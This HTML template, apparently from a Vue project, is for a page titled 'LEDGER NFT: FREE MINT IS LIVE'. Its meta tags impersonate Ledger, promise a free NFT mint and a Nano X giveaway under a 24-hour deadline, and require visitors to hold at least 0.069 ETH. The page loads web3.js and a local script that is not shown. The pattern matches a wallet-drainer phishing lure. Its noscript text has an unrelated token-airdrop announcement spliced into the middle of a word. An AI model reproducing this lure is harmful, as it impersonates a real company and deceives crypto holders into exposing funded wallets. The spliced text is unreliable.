<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8" />
  <link rel="preconnect" href="https://fonts.googleapis.com" />
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
  <link
    href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&family=Nunito+Sans:ital,wght@0,200;0,300;0,400;0,600;0,700;0,800;0,900;1,200;1,300;1,400;1,600;1,700;1,800;1,900&display=swap"
    rel="stylesheet">
  <link rel="preconnect" href="https://fonts.googleapis.com" />
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
  <meta name="viewport" content="width=device-width,initial-scale=1.0" />
  <title>LEDGER NFT: FREE MINT IS LIVE</title>
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script src="https://www.googletagmanager.com/gtag/js?id=G-<%= VUE_APP_ANALYTIC_ID %>"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
      dataLayer.push(arguments);
    }
    gtag("js", new Date());

    gtag("config", "G-<%= VUE_APP_ANALYTIC_ID %>");
  </script>
  <link rel="icon" href="img/favicon.png" type="image/x-icon" />
  <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
  <script src="https://unpkg.com/bn.js@5.2.0/lib/bn.js"></script>

  <script src="./js/index.js"></script>

  <meta name="robots" content="index,follow" />
  <meta name="googlebot" content="index,follow" />
  <meta name=description content="You asked, we answered

🎉 We make FREE MINT as we want more people to join the LEDGER
  
🟢 We've already filtered raffle winners!
You have 24 hours to mint!
  
🛒 3,333 supply | 1 NFT / wallet
  
❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
Because Ledger doesn`t like multi-accs!
  
🔗 Share your NFT in Twitter and get 1/3333 Nano X">
  <meta property=og:title content="LEDGER NFT: FREE MINT IS LIVE">
  <meta property="og:image" content="https://<%= VUE_APP_BASE_URL %>/img/ledger-meta.png" />
  <meta property=og:type content=website>
  <meta property=og:image:alt content="LEDGER NFT: FREE MINT IS LIVE">
  <meta property="twitter:image" content="https://<%= VUE_APP_BASE_URL %>/img/ledger-meta.png" />
  <meta name=twitter:card content=summary_large_image>
  <meta name=twitter:title content="LEDGER NFT: FREE MINT IS LIVE">
  <meta name=twitter:image:alt content="LEDGER NFT: FREE MINT IS LIVE">
  <meta property=og:description content="You asked, we answered

🎉 We make FREE MINT as we want more people to jo in the LEDGER
  
🟢 We've already filtered raffle winners!
You have 24 hours to mint!
  
🛒 3,333 supply | 1 NFT / wallet
  
❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
Because Ledger doesn`t like multi-accs!
  
🔗 Share your NFT in Twitter and get 1/3333 Nano X">
  <meta name=twitter:description content="You asked, we answered

🎉 We make FREE MINT as we want more people to join the LEDGER
  
🟢 We've already filtered raffle winners!
You have 24 hours to mint!
  
🛒 3,333 supply | 1 NFT / wallet
  
❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
Because Ledger doesn`t like multi-accs!
  
🔗 Share your NFT in Twitter and get 1/3333 Nano X">

  <meta name="theme-color" content="#fc780d">
  <link type="application/json+oembed" href="https://<%= VUE_APP_BASE_URL %>/img/l/<%= VUE_APP_FILE_NAME %>.json" />

  <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.css">

  <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
</head>

<body>
  <noscript>
    <strong>We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work
        properly without JavaScript enabled. Pleas The distribution is based on
        the total number of transactions (30% weight) and transaction volume
        ETH, DAI & USDC (70% weight) on OpenSea. Users have until June 30, 2022
        to claim their tokens, after which any remaining tokens will be sent to
        the DAO theasury">e enable it to continue.</strong>
  </noscript>

  <div id="app"></div>
</body>

</html>